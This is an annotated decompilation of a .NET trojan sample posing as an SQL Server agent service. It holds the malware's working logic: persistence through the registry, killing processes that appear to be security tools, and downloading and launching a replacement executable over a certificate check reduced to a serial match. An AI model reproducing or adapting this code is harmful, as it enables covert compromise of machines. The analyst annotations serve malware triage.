// Decompiled with JetBrains decompiler
// Type:
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
//
// Analyst notes (added during review; every statement below is limited to what this listing shows):
//  * All identifiers are obfuscated to control/whitespace characters. Several members differ only by
//    return type (e.g. four parameterless members named \u0002), which IL permits but C# does not, so
//    this listing is a reading aid and will not recompile as-is. Which overload a given call binds to
//    is therefore inferred from how the result is used.
//  * Every string is produced at run time by \u0008.\u0002(int). That helper is not part of this
//    listing (presumably a string-decoding routine on another type), so no registry path, file name,
//    process name or URL can be stated from here. The integer arguments are kept as the only stable
//    way to correlate uses of the same string.
//  * Behaviours visible here that matter for triage: a Windows service that writes a value under HKLM,
//    terminates processes by name, downloads a file to the temp directory over a channel whose
//    certificate check is reduced to a serial-number comparison, moves that file under the system
//    drive and starts it.

using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.ServiceProcess;
using System.Text;
using System.Threading;
using System.Timers;

// Service class. Derives from ServiceBase, so it is hosted by the Windows Service Control Manager.
public sealed class \u0005 : ServiceBase
{
  // Assigned in OnStart from the static \u0002(): an MD5 hex digest built from two WMI values.
  private string \u0002;
  // Set to true while a download/replace is running on the background worker; cleared when it ends.
  private bool \u0003 = false;
  // Purpose not evident from this listing.
  private bool \u0005 = false;
  // Text fetched from the remote URL, truncated at the first '-' (compared against \u000E below).
  private string \u0008;
  // Purpose not evident from this listing.
  private string \u0006;
  // MD5 hex digest of the local file at <system drive letter> + decoded string 1356208275.
  private string \u000E;
  // Purpose not evident from this listing.
  private string \u000F;
  // Integer read from an HKLM registry value in OnStart; no later read is visible here.
  private int \u0002\u2000;
  // Fragment inserted into the request URLs; replaced by a decoded string when a marker file exists.
  private string \u0003\u2000 = string.Empty;
  // "Paused" flag: while true, the periodic handlers return early.
  private bool \u0005\u2000 = false;
  // 30-second timer that clears the paused flag (see \u0003(object, ElapsedEventArgs)).
  private System.Timers.Timer \u0008\u2000 = new System.Timers.Timer(30000.0);
  // Designer-style component container; only touched in Dispose.
  private IContainer \u0006\u2000 = (IContainer) null;
  // Worker that performs the download and file replacement.
  private BackgroundWorker \u000E\u2000;
  // Second worker; its DoWork handler is empty in this listing.
  private BackgroundWorker \u000F\u2000;

  // Constructor: delegates to the initialiser that creates the workers and sets ServiceName.
  public \u0005() => this.\u000E();

  // Service start-up. Runs one-off initialisation, then arms three timers:
  // a 1 s tick (main loop), the 30 s pause-reset timer (left disabled), and a 60 s re-hash tick.
  protected override void OnStart(string[] _param1)
  {
    // Sets the URL fragment \u0003\u2000 if a marker file exists.
    this.\u0008();
    // Result is discarded, so this presumably binds to the void clean-up overload
    // (kill process / delete registry value / delete file) - TODO confirm against IL.
    this.\u0002();
    // Host fingerprint (static overload returning string).
    this.\u0002 = \u0005.\u0002();
    // Fetch the remote value into \u0008.
    this.\u0003();
    // Hash the local file into \u000E.
    this.\u0005();
    // CreateSubKey opens the HKLM key or creates it when missing.
    RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u0008.\u0002(1356208489), RegistryKeyPermissionCheck.ReadWriteSubTree);
    // NOTE(review): the cast unboxes the result directly and is not inside a try block, so a missing
    // value would throw here; presumably an installer writes it beforehand - cannot confirm from here.
    this.\u0002\u2000 = (int) subKey.GetValue(\u0008.\u0002(1356208422));
    subKey.Close();
    // Main loop: fires every second.
    System.Timers.Timer timer1 = new System.Timers.Timer(1000.0);
    timer1.Elapsed += new ElapsedEventHandler(this.\u0005);
    timer1.AutoReset = true;
    timer1.Enabled = true;
    // Pause-reset timer: wired up but only enabled once the main loop sees the marker file.
    this.\u0008\u2000.Elapsed += new ElapsedEventHandler(this.\u0003);
    this.\u0008\u2000.AutoReset = true;
    this.\u0008\u2000.Enabled = false;
    // Re-hash of the local file every 60 seconds.
    System.Timers.Timer timer2 = new System.Timers.Timer(60000.0);
    timer2.Elapsed += new ElapsedEventHandler(this.\u0002);
    timer2.AutoReset = true;
    timer2.Enabled = true;
  }

  // Clean-up routine: kills every process named by decoded string 1356208433, deletes the registry
  // value of that same name under the HKLM key 1356208444, and deletes one file under the system
  // drive. All failures are swallowed.
  private void \u0002()
  {
    try
    {
      this.\u0002(\u0008.\u0002(1356208433));
      RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
      registryKey.DeleteValue(\u0008.\u0002(1356208433));
      registryKey.Close();
      // [0] takes the first character of the system directory's root, i.e. the drive letter.
      System.IO.File.Delete(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208368));
    }
    catch
    {
    }
  }

  // 60 s timer handler: recomputes the local file hash unless the paused flag is set.
  private void \u0002(object _param1, ElapsedEventArgs _param2)
  {
    if (this.\u0005\u2000)
      return;
    this.\u0005();
  }

  // Returns the MD5 digest of the file at _param1 as a string, one formatted chunk per byte
  // (the format specifier is a decoded string, presumably hex). Returns string.Empty when the
  // file does not exist or any exception occurs.
  private string \u0002(string _param1)
  {
    if (!System.IO.File.Exists(_param1))
      return string.Empty;
    StringBuilder stringBuilder = new StringBuilder();
    try
    {
      // FileShare.ReadWrite lets the file be hashed while another process has it open.
      FileStream inputStream = new FileStream(_param1, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
      byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
      inputStream.Close();
      for (int index = 0; index < hash.Length; ++index)
        stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
    }
    catch
    {
      return string.Empty;
    }
    return stringBuilder.ToString();
  }

  // Downloads text from <decoded 1356208293> + \u0003\u2000 + <decoded 1356208257> and stores the part
  // before the first '-' in \u0008. It is later compared with the local file's MD5, so it is
  // presumably the digest of the current remote build. Failures are swallowed.
  private void \u0003()
  {
    try
    {
      this.\u0008 = this.\u0003(\u0008.\u0002(1356208293) + this.\u0003\u2000 + \u0008.\u0002(1356208257)).Split('-')[0];
    }
    catch
    {
    }
  }

  // Stores the MD5 of the file at <system drive letter> + <decoded 1356208275> in \u000E.
  // The same path is the one started by the main loop and overwritten by the download worker.
  private void \u0005() => this.\u000E = this.\u0002(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208275));

  // Builds a per-host identifier: the first instance of a WMI class supplies one property value,
  // a second WMI object keyed on the system drive letter supplies another, and the MD5 of their
  // concatenation is returned as a string. Class and property names are decoded strings
  // (presumably hardware/volume serials - TODO confirm).
  private static string \u0002()
  {
    string empty = string.Empty;
    foreach (ManagementObject instance in new ManagementClass(\u0008.\u0002(1356208197)).GetInstances())
    {
      // Only the first instance is used.
      if (empty == string.Empty)
      {
        empty = instance.Properties[\u0008.\u0002(1356208219)].Value.ToString();
        break;
      }
    }
    string str1 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
    ManagementObject managementObject = new ManagementObject(\u0008.\u0002(1356208173) + str1 + \u0008.\u0002(1356208144));
    managementObject.Get();
    string str2 = managementObject[\u0008.\u0002(1356208153)].ToString();
    byte[] hash = MD5.Create().ComputeHash(Encoding.Default.GetBytes(empty + str2));
    StringBuilder stringBuilder = new StringBuilder();
    for (int index = 0; index < hash.Length; ++index)
      stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
    return stringBuilder.ToString();
  }

  // Fetches the URL _param1 and returns the response body decoded as ASCII.
  // On any exception: if the URL contains decoded string 1356208293, the request is retried with
  // one decoded substring replaced by another (presumably a fallback host or scheme); otherwise
  // string.Empty is returned.
  private string \u0003(string _param1)
  {
    try
    {
      // Static property: replaces certificate validation for every request in the process with
      // the serial-number check implemented by the nested class at the end of this listing.
      ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
      StringBuilder stringBuilder = new StringBuilder();
      byte[] numArray = new byte[8192];
      // Response and stream are never closed or disposed here.
      Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
      int count;
      do
      {
        count = responseStream.Read(numArray, 0, numArray.Length);
        if (count != 0)
        {
          string str = Encoding.ASCII.GetString(numArray, 0, count);
          stringBuilder.Append(str);
        }
      }
      while (count > 0);
      responseStream.Flush();
      return stringBuilder.ToString();
    }
    catch
    {
      // NOTE(review): this recursion ends only if the replacement removes substring 1356208293
      // from the URL or the retry succeeds; the decoded values are needed to confirm it terminates.
      return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 ? this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356209101))) : string.Empty;
    }
  }

  // Terminates every process whose name equals _param1. Not guarded: Kill() can throw.
  private void \u0002(string _param1)
  {
    foreach (Process process in Process.GetProcessesByName(_param1))
      process.Kill();
  }

  // If the file named by decoded string 1356209061 exists, sets the URL fragment \u0003\u2000 to
  // decoded string 1356209033; otherwise leaves it empty. Failures are swallowed.
  private void \u0008()
  {
    try
    {
      if (!System.IO.File.Exists(\u0008.\u0002(1356209061)))
        return;
      this.\u0003\u2000 = \u0008.\u0002(1356209033);
    }
    catch
    {
    }
  }

  // Reads and returns the whole content of the file named by decoded string 1356209041.
  // No caller that uses the returned string is visible in this listing.
  private string \u0002()
  {
    TextReader textReader = (TextReader) new StreamReader(\u0008.\u0002(1356209041));
    string end = textReader.ReadToEnd();
    textReader.Close();
    return end;
  }

  // Writes _param2 as a single line to the file <decoded 1356209003> + _param1 + <decoded 1356209013>
  // and always returns true. No caller is visible in this listing.
  private bool \u0002(string _param1, string _param2)
  {
    TextWriter textWriter = (TextWriter) new StreamWriter(\u0008.\u0002(1356209003) + _param1 + \u0008.\u0002(1356209013));
    textWriter.WriteLine(_param2);
    textWriter.Close();
    return true;
  }

  // Downloads the URL _param1 to the local path _param2 and returns true on success.
  // Uses the same certificate policy and the same retry-with-replaced-substring fallback as the
  // text download above (the replacement string differs: 1356208960 instead of 1356209101).
  private bool \u0003(string _param1, string _param2)
  {
    try
    {
      ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
      byte[] buffer = new byte[8192];
      Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
      // OpenOrCreate does not truncate: if a longer file already exists at _param2, its tail
      // remains after the new bytes are written.
      FileStream output = new FileStream(_param2, FileMode.OpenOrCreate);
      BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
      int count;
      do
      {
        count = responseStream.Read(buffer, 0, buffer.Length);
        if (count != 0)
          binaryWriter.Write(buffer, 0, count);
      }
      while (count > 0);
      responseStream.Flush();
      binaryWriter.Close();
      output.Close();
      return true;
    }
    catch
    {
      return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 && this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356208960)), _param2);
    }
  }

  // Update check. Refreshes the remote value when it differs from the local hash or is empty,
  // then, if the two still differ and the remote value is non-empty, marks an update as in
  // progress and hands { download URL, temp-directory target path } to the background worker.
  private void \u0006()
  {
    if (this.\u0008 != this.\u000E || this.\u0008 == string.Empty)
      this.\u0003();
    // Equivalent to: return if remote == local, or remote is empty.
    if (!(this.\u0008 != this.\u000E) || !(this.\u0008 != string.Empty))
      return;
    this.\u0003 = true;
    string tempPath = Path.GetTempPath();
    this.\u000E\u2000.RunWorkerAsync((object) new string[2]
    {
      \u0008.\u0002(1356208985) + this.\u0003\u2000 + \u0008.\u0002(1356208948),
      tempPath + \u0008.\u0002(1356208920)
    });
  }

  // Process-termination sweep over all running processes. A process is killed when its window
  // title or executable file name contains one of three decoded substrings, or when its
  // executable's directory contains every file of one of the file-name sets below.
  // The decoded names are not available here; presumably each set fingerprints an installed
  // product by its files - TODO confirm once strings are decoded. No caller is visible in this
  // listing.
  public void \u0005\u2004\u2006\u2009\u2001\u2009\u2009\u2004\u2001\u2001\u2003\u2001\u2008\u2008\u2003\u200A\u2001()
  {
    string[] strArray1 = new string[1]
    {
      \u0008.\u0002(1356208871)
    };
    string[] strArray2 = new string[2]
    {
      \u0008.\u0002(1356208892),
      \u0008.\u0002(1356208846)
    };
    string[] strArray3 = new string[2]
    {
      \u0008.\u0002(1356208800),
      \u0008.\u0002(1356208815)
    };
    string[] strArray4 = new string[1]
    {
      \u0008.\u0002(1356208772)
    };
    string[] strArray5 = new string[1]
    {
      \u0008.\u0002(1356208795)
    };
    string[] strArray6 = new string[1]
    {
      \u0008.\u0002(1356208758)
    };
    string[] strArray7 = new string[2]
    {
      \u0008.\u0002(1356208719),
      \u0008.\u0002(1356208735)
    };
    string[] strArray8 = new string[2]
    {
      \u0008.\u0002(1356208719),
      \u0008.\u0002(1356208688)
    };
    string[] strArray9 = new string[3]
    {
      \u0008.\u0002(1356208640),
      \u0008.\u0002(1356208655),
      \u0008.\u0002(1356208670)
    };
    // Ten slots, nine distinct sets: strArray1 appears first and last.
    string[][] strArray10 = new string[10][]
    {
      strArray1,
      strArray2,
      strArray3,
      strArray4,
      strArray5,
      strArray6,
      strArray7,
      strArray8,
      strArray9,
      strArray1
    };
    foreach (Process process in Process.GetProcesses())
    {
      // Per-process try/catch: MainModule access fails for processes the service cannot open,
      // and those are simply skipped.
      try
      {
        string directoryName = Path.GetDirectoryName(process.MainModule.FileName);
        string fileName = Path.GetFileName(process.MainModule.FileName);
        string mainWindowTitle = process.MainWindowTitle;
        if (mainWindowTitle.IndexOf(\u0008.\u0002(1356209645)) != -1 || mainWindowTitle.IndexOf(\u0008.\u0002(1356209661)) != -1 || fileName.IndexOf(\u0008.\u0002(1356209614)) != -1)
        {
          process.Kill();
        }
        else
        {
          for (int index1 = 0; index1 < strArray10.Length; ++index1)
          {
            string[] strArray11 = strArray10[index1];
            // flag stays true only if every file of this set exists next to the executable.
            bool flag = true;
            for (int index2 = 0; index2 < strArray11.Length; ++index2)
            {
              string str = strArray11[index2];
              if (!System.IO.File.Exists(directoryName + \u0008.\u0002(1356209568) + str))
              {
                flag = false;
                break;
              }
            }
            if (flag)
            {
              process.Kill();
              break;
            }
          }
        }
      }
      catch
      {
      }
    }
  }

  // Inspects processes named by decoded string 1356209576. Instances running from any path other
  // than <system drive letter> + <decoded 1356208275> are killed, as are instances at that path
  // without a main window. Returns true if an instance at that path has a main window.
  // No caller that uses the result is visible in this listing.
  private bool \u0002()
  {
    string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
    Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
    bool flag = false;
    for (int index = 0; index < processesByName.Length; ++index)
    {
      if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
        processesByName[index].Kill();
      else if (processesByName[index].MainWindowHandle.ToInt32() != 0)
        flag = true;
      else
        processesByName[index].Kill();
    }
    return flag;
  }

  // 30 s timer handler: clears the paused flag and disables the timer again.
  private void \u0003(object _param1, ElapsedEventArgs _param2)
  {
    this.\u0005\u2000 = false;
    this.\u0008\u2000.Enabled = false;
  }

  // Main loop, run every second by timer1:
  //  1. If a marker file exists under the system drive, delete it, kill the process named by
  //     decoded string 1356208433 and pause for 30 s.
  //  2. Ensure an HKLM registry value holds the path of the managed executable
  //     (presumably an autorun/persistence entry - the key path is a decoded string).
  //  3. Run the update check, unless an update is already in progress.
  //  4. Kill same-named processes running from any other path and start the managed executable
  //     if no instance from the expected path is running.
  private void \u0005(object _param1, ElapsedEventArgs _param2)
  {
    string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
    if (System.IO.File.Exists(str + \u0008.\u0002(1356209593)))
    {
      try
      {
        System.IO.File.Delete(str + \u0008.\u0002(1356209593));
      }
      catch
      {
      }
      this.\u0002(\u0008.\u0002(1356208433));
      this.\u0005\u2000 = true;
      this.\u0008\u2000.Enabled = true;
    }
    if (this.\u0005\u2000)
      return;
    // Same HKLM key as the one the clean-up routine deletes a value from.
    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
    string empty1 = string.Empty;
    // empty2 is never read in this method.
    string empty2 = string.Empty;
    try
    {
      empty1 = (string) registryKey.GetValue(\u0008.\u0002(1356209512));
    }
    catch
    {
    }
    try
    {
      // Rewritten on every tick where the stored value differs, so a manual edit or removal of
      // the value is undone within about one second while the service is running.
      if (empty1 != str + \u0008.\u0002(1356208275))
      {
        registryKey.CreateSubKey(\u0008.\u0002(1356209512));
        registryKey.SetValue(\u0008.\u0002(1356209512), (object) (str + \u0008.\u0002(1356208275)));
      }
    }
    catch
    {
    }
    registryKey.Close();
    if (this.\u0003)
      return;
    this.\u0006();
    // Re-checked because the update check above may have just started a download.
    if (this.\u0003)
      return;
    Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
    bool flag = false;
    for (int index = 0; index < processesByName.Length; ++index)
    {
      if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
        processesByName[index].Kill();
      else
        flag = true;
    }
    if (flag)
      return;
    try
    {
      // Restart of the managed executable: terminating it alone does not stop it from coming
      // back while this service keeps running.
      Process.Start(str + \u0008.\u0002(1356208275));
    }
    catch
    {
    }
  }

  // Stop request from the Service Control Manager: intentionally does nothing.
  protected override void OnStop()
  {
  }

  // Empty DoWork handler; not attached to any worker in this listing.
  private void \u0002(object _param1, DoWorkEventArgs _param2)
  {
  }

  // DoWork handler of the update worker. Argument is { url, tempFilePath }.
  // After a successful download it kills the processes named by decoded strings 1356208433 and
  // 1356209576, waits 3 s, replaces the managed executable with the downloaded file and records
  // the remote value as the new local hash. The update-in-progress flag is cleared in all cases.
  private void \u0003(object _param1, DoWorkEventArgs _param2)
  {
    string[] strArray = (string[]) _param2.Argument;
    string str1 = strArray[0];
    string sourceFileName = strArray[1];
    if (this.\u0003(str1, sourceFileName))
    {
      // Return value discarded; the call has no effect here.
      Path.GetTempPath();
      string str2 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
      this.\u0002(\u0008.\u0002(1356208433));
      this.\u0002(\u0008.\u0002(1356209576));
      // Pause before touching the file (presumably to let the killed processes release it).
      Thread.Sleep(3000);
      try
      {
        if (System.IO.File.Exists(str2 + \u0008.\u0002(1356208275)))
          System.IO.File.Delete(str2 + \u0008.\u0002(1356208275));
        if (!Directory.Exists(str2 + \u0008.\u0002(1356209527)))
          Directory.CreateDirectory(str2 + \u0008.\u0002(1356209527));
        System.IO.File.Move(sourceFileName, str2 + \u0008.\u0002(1356208275));
      }
      catch
      {
      }
      // The remote value is copied without re-hashing the moved file, so the downloaded content
      // is not checked against it at this point; the 60 s re-hash tick overwrites this later.
      this.\u000E = this.\u0008;
    }
    this.\u0003 = false;
  }

  // Empty DoWork handler attached to the second worker.
  private void \u0005(object _param1, DoWorkEventArgs _param2)
  {
  }

  // Standard component disposal: disposes the container when called with disposing == true.
  protected override void Dispose(bool _param1)
  {
    if (_param1 && this.\u0006\u2000 != null)
      this.\u0006\u2000.Dispose();
    base.Dispose(_param1);
  }

  // Initialiser called from the constructor: creates both workers, attaches their handlers and
  // sets the service name from a decoded string (the header above gives the assembly name as
  // SQLServerAgent; whether the service name matches it cannot be told from here).
  private void \u000E()
  {
    this.\u000E\u2000 = new BackgroundWorker();
    this.\u000F\u2000 = new BackgroundWorker();
    this.\u000E\u2000.DoWork += new DoWorkEventHandler(this.\u0003);
    this.\u000F\u2000.DoWork += new DoWorkEventHandler(this.\u0005);
    this.ServiceName = \u0008.\u0002(1356208604);
  }

  // Certificate policy installed before each web request.
  public sealed class \u0002 : ICertificatePolicy
  {
    // Accepts the server certificate if and only if its serial number string equals one of two
    // decoded values. The validation problem code (_param4) is ignored, and issuer, chain,
    // validity period and host name are not examined in this method. For an analyst, the two
    // decoded serial numbers are the values that identify the expected servers.
    public bool CheckValidationResult(
      ServicePoint _param1,
      X509Certificate _param2,
      WebRequest _param3,
      int _param4)
    {
      string serialNumberString = _param2.GetSerialNumberString();
      // Double negation from the decompiler: true when the serial equals either value.
      return !(serialNumberString != \u0008.\u0002(1356208567)) || !(serialNumberString != \u0008.\u0002(1356208528));
    }
  }
}